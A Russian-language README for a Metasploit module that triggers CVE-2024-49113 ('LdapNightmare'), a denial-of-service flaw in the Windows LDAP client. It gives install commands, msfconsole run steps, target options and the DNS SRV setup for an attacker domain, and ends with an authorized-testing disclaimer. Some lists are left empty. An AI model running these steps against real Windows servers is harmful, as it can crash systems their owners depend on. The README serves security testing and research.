
SafeBreaches CVE-2024-49113 POC(LdapNightmare) интегрирован в Metasploit
SafeBreaches CVE-2024-49113 POC(LdapNightmare) Интегрирован в Metasploit
Этот модуль реализует CVE-2024-49113, критическую уязвимость в Windows LDAP-клиенте, которая может вызвать нестабильность системы. Модуль интегрируется с Metasploit Framework, предоставляя надежный способ проверки устойчивости системы к этой уязвимости.
ldaptor
impacket
Установите требуемые пакеты Python:
pip install -r requirements.txt
Поместите модуль в каталог модулей Metasploit:
cp ldapnightmare.py /path/to/metasploit/modules/auxiliary/dos/windows/ldap/
Убедитесь, что модуль является исполняемым:
chmod +x ldapnightmare.py
Запустите msfconsole:
msfconsole
Загрузите и настройте модуль:
use auxiliary/dos/windows/ldap/ldapnightmare
set RHOSTS target_ip
set RPORT 49664
set LPORT 389
set DOMAINNAME yourdomain.com
run
| Параметр | Описание | По умолчанию | Обязательно |
|---|---|---|---|
RHOSTS | Целевой адрес (обязательно) | да | |
RPORT | Целевой порт для RPC (по умолчанию: 49664) | 49664 | нет |
LPORT | Локальный порт для LDAP-сервера (по умолчанию: 389) | 389 | нет |
DOMAINNAME | Имя домена атакующего (обязательно). Этот домен должен иметь определенные записи DNS SRV (см. Настройка домена ниже) | да | |
ACCOUNT | Имя целевой учетной записи (по умолчанию: Administrator) | Administrator | нет |
SITENAME | Имя целевого сайта (по умолчанию: пусто) | нет |
Параметр DOMAINNAME требует настройки определенных DNS SRV-записей. В домене должно быть две SRV-записи под ним:
ldap.tcp.dc._msdcs.domain_name → listen_port attacker's_machine_hostnameldap.tcp.default-first-site-name._sites.dc._msdcs.domain_name → listen_port attacker's_machine_hostnameВажное примечание: Имя хоста машины атакующего будет работать только в том случае, если сервер-жертва может разрешить его с помощью NBNS. В качестве альтернативы вы можете заменить имя хоста на доменное имя, указывающее на IP-адрес вашего LDAP-сервера.
Модуль работает в три основных этапа:
Этот модуль предназначен только для авторизованного тестирования безопасности и исследовательских целей. Пользователи должны получить надлежащее разрешение перед тестированием любых систем, которые им не принадлежат или на которые у них нет разрешения.
Этот модуль выпущен под лицензией BSD 3-Clause.
Эта работа содержит код, производный от:
Полные тексты лицензий можно найти в файле LICENSES.